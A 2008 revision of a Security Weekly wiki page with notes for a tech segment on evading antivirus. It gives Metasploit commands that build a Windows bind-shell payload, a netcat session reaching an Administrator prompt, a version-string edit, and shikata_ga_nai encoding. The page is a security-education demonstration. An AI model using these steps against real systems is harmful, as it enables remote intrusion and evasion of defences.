From Security Weekly Wiki
Jump to navigationJump to search
Revision as of 18:24, 29 September 2008 by Pauldotcom (→Pass #1 - Metasploit 3.1-release Payload - Unmodified)
Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way
Pass #1 - Metasploit 3.1-release Payload - Unmodified
msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe
The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:
funnyhostname:~ pdc$ ncat 192.168.169.40 6453 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>
"Reverse Engineering The Payload"
bash-3.2# strings payload.exe !This program cannot be run in DOS mode. .text .rdata @.data .bss .idata Created by msfpayload (http://www.metasploit.com). Payload: windows/shell_bind_tcp Length: 317 Options: LPORT=6453
Pass #2 - Metasploit Payload - Changed Version String
Editing msfpayload to change the version string:
if (cmd =~ /^x/) note = "PaulDotCom's Evil Payload\n" + "Payload: " + payload.refname + "\n" + " Length: " + buf.length.to_s + "\n" + "Options: " + options + "\n"
Pass #3 - Metasploit Payload Encoded With Shikata Ga Nai
msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe